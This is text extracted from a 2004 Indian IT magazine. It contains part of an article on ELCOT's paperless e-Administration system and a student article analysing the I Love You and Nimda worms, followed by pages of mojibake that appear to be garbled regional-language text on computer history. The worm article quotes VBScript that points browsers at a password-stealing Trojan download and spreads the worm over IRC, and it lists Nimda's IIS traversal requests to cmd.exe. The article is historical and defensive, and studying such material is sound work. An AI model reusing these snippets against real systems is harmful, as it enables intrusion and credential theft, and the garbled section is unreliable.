Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

[THORNAeTHORNthorn LmthornETHfrac14frac14ETH HkthornETH kthornSETHethorn kthornSETHethorn VoumlETH_ccedilSTHORNfrac12currenethornLEcirc_THORNS c^OcircOgraveethorn HL OgraveRETHV QTHORN ccedil cETH^OcirccOgraveethorn ethornMTHORN`ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETHethorn D`ugraverTHORNthorn kUacutethorn Q[Ecircagrave `THORNYIumlNtildeLOtilde`EcircOcircVethornethorn S_ecirc OVETHBmthornETHfrac14frac14ETH HkthornETHethorn D`OgravedETHNOgravekthornaETH$frac14fOgraveethorn LOtilde`EcircOcircVethornethorn ALETHethorn AhETH[Ntilde[bthornETHaOgraveethorn LcTHORNNmthornETHfrac14frac14ETH Lcccedil Mnagrave HaOtilde ^THORNL OgraveaNHkthornETHLEcirc ^THORNL OgravemthornETHL`otildeTHORN AElig LethornETHBmthornETHfrac14frac14ETH 1981OgraveethornABaTHORNHcccedil (IBM) LshyAEligETH_Ntilde [ETHethorn `otildec`jagrave_ETHmccedilthorn LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornVETHBcccedil cETHNETHSTHORN_ccedil (Time Magazine) HkthornETHLEcircMan of the Year AMOcircETH Ograve]mthornETHfrac14frac14ETH Q[Ecircagrave`THORNYIumlNtildeethorn LOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBaETHeEcircthorn HkthornETHLEcircLTHORN eTHORNthorn Ograve]szlig_tTHORN_ LETHdagraveOcircOgraveethorn aOcircakthornETHethorn LeTHORNthornOgravekthornaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ [`ugraveethorn OgravekthornETHBDWTHORNOgravemthornfrac14frac14ETH1970 eEcircthorn 1980 cjTHORNkthornETH c^OcircOgraveethorn LOtilde`EcircOcircVethornOgravecETHVETHOgravecETHVTHORN bthornETHaOgraveethorn AOgraveceTHORNthornLETHaETHjNtildefrac14ethorn koacutethorn]macrAEligLEcirc^THORNLETHethorn LeTHORNthornjETHeTHORNthornTHORNmthornETHfrac14frac14ETH AOgraveceTHORNthornLETHethornjEcirc ethorncETHOgraveLagraveVccedilNEcircXIumlTHORNL OgravejcETH_frac14ethorn LETHDAtildecurrenethorn ANOgraveethornLOtilde`EcircOcircVethorn OgraveLETHXIumlTHORNOtilde (Computer coding)OgravekthornETHBTHORNaETH QflaquoAEligETH aOcircETH_ethornccedilcETH_ mthornNETHBaETH AethorncdivideLOgravemthornfrac14frac14ETH

1976 cjTHORNkthornETHOgraveethorn OgraveSOgrave_ethornETHmccedilthorn OgravecETHVethornccediljccedilLshyAEligETH_Ntilde `otildec ethorn `ETHBUuml [ETHethorn LETHethornccedilOgraveethornLOtilde`EcircOcircVethornVTHORNH mthornNETHBmthornETHfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornVTHORN LETHethornccedilethornOgraveaN Ograve[szligfethorn `eTHORNthorncETHZ aOcircETHOgraveVethornNtildeethorn OgravemthornOgravebthornmccedilthornOgrave[szligfethorn QETH` HaOtilde BOtildeSTHORN_ccedilethorn ayETHLEcirc Ograved OgraveLtimesZjTHORNjcmacrAEligOgraveethorn cETH`THORN `ETHeEcircthornTHORNmthornETHfrac14frac14ETH 1978 cjTHORNkthornETHethorn _OcircHL OVZETH jcNotilde `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QcLuacuteIgrave[LeTHORNthornTHORNmthornETHfrac14frac14ETH HkTHORNthornaiagrave OgraveQjccedilethorn NotildeETHumlccedilAElig cETHfrac12currenethorn `THORNVeccedilthorn

OITS-2004

43

aTHORN AEligjTHORNjccedilEcircfrac14 LOtilde`EcircOcircVethorn OgraveQjccedil OgraveMfOgraveethorn kthornethornETHBTHORNmthornETHfrac14frac14ETHaTHORNsETH_ethorn NotildeN[THORN jkthorn jETH^ETHethornZ OgravemthornETHL LTHORN eTHORNthornLOtilde`EcircOcircVethornLEcirc akEcircthornf bthornETHaOgraveethorn aOcircakthornETHethorn LeTHORNthorn ETHeTHORNthornOgraveaOgravejTHORN ETHBUuml OgraveaszligsETH_THORNLcETHOgrave_ `otildeOgraveQfrac12currenETH QfETHBOgravemthornfrac14frac14ETHOgraveSethornmicroAElig HaOtilde A`mccedilthorn (Apple) LshyAEligETH_NtildeLOtilde`EcircOcircVethornLEcirc QfETHBaETH`ETHBUuml jkthornS D`ETHmacrAElig aETHkthornETHethornLOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn cETHBOgraveLotildeETHj$ccedilfrac14Vccedil(Microsoft)ethorn Windowsethorn DiexclthornETHa_jETH^ETHethornZ OgravemthornETHLfrac14ethorn QETHkTHORNthorn]ETHLEcirc dOgravefrac12curren aYIumlETHBmthornETHfrac14frac14ETHaragravethorncETH_ccedil AOgravec `qc `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn D`OgraveethornAOgravemthornETHQ_ETH LeTHORNthornaETHfrac14frac14ETH HkthornETHethorn NotildeN[THORN `ETHBUumlOgraveaszligsETH_THORNLcETHOgrave_ ]THORN_ethornETH[THORN NOgraveaiZETH LeTHORNthorn _EumlA _EumlA[Ocirc cETH^OcirccOgraveethorn `oacuteTHORNaNtildeaETHjNtildeEcircfrac14 QLTHORN[ LeTHORNthornaETHOgraveethornmthornETHNTHORNRlaquoTHORNAEligAEligfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn cZTHORNi `eTHORNthorn QTHORNlaquoAEligAEligETHLeTHORNthorn ETHOgraveethornfrac14frac14ETH HkthornETH Ograve]MTHORN ETHOgraveethorn lethorn QTHORNkiumlTHORNthorn ETHOgraveethornHaOtilde cZTHORNi `eTHORNthorn _Ecircbthorna LeTHORNthorn ETHOgraveethornfrac14frac14ETH jaEcircWETHeEcircthorncSETHLETH OgravekthornmthornETH HkthornETH hveEcircthorn bTHORNthorn_iuml bTHORNthorn_iuml OgravemthornETHLEcircfrac14QTHORNkiumlTHORNthorn ETHOgraveethorn HaOtilde RaTHORNeEcircthorn c^Ocirc aTHORNOgravehyacuteiZ LeTHORNthorn bTHORNthorn_iuml[ETHaETHeTHORNthorn ETHOgraveethornfrac14frac14ETH HkTHORNthorn `THORNYIumlNtildeethorn LOtilde`EcircOcircVethornOgraveethorn Loacute[oumlTHORNc aEcircwTHORN(Artificial Intelligence)ethorn jkthornETHmacrAElig[ETH_THORNAdETHHfrac14frac14ETH HkTHORNthorn ]ccedilbEumlthorn[ aTHORN]OcircETHethorn `otildeOgravemacrAEligETHN $frac14fOgraveethornLOtilde`EcircOcircVethorn MZTHORN bTHORNthorn[Ograveethorn `otildeOgraveah LeTHORNthorn aTHORNOgravehyacuteiZLeTHORNthorn ETHOgraveethorn DrthorncopyAElig AOgraveNiuml AEligNTHORNeTHORNthorn c^OcircOgraveethorn `otildeOgraveahLeTHORNthorn [Ocirc jOtildeNotildekthorn LeTHORNthorn ETHOgraveethorn XETHbrvbarAEligethorn `eTHORNthorn OgraveethornNNtildeOgrave]MTHORN ETHOgraveethorn cZTHORNi `eTHORNthorn D``ETH]OcircLEcirc `otildecETHZLeTHORNthorn ETHOgraveethorn `ETHZTHORNOgraveethorn aEcircXIumlTHORN ETHOgraveethorn HaOtilde [ETHjccedil J OgraveQjccedilA]THORN OgraveMfTHORN ETHOgraveethornfrac14frac14ETH OgraveLOgrave[L LETHdagraveOcirc LeTHORNthornaETH`ETHBUuml[NtildelccedilZ aEcircwTHORN HaOtilde NETH^ sETH_ethorn AahOcircL[ETH

